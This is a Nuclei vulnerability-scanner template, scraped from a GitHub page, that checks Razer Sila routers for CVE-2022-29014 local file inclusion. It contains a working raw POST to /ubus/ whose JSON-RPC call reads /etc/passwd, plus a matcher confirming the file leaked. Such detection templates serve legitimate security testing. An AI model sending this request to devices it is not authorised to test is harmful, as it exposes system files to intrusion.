-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-29014.yaml
38 lines (31 loc) · 1.08 KB
/
CVE-2022-29014.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2022-29014
info:
name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion
author: edoardottt
severity: high
description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.
reference:
- https://www.exploit-db.com/exploits/50864
- https://nvd.nist.gov/vuln/detail/CVE-2022-29014
- https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-29014
tags: cve,cve2022,razer,lfi,router
requests:
- raw:
- |
POST /ubus/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/15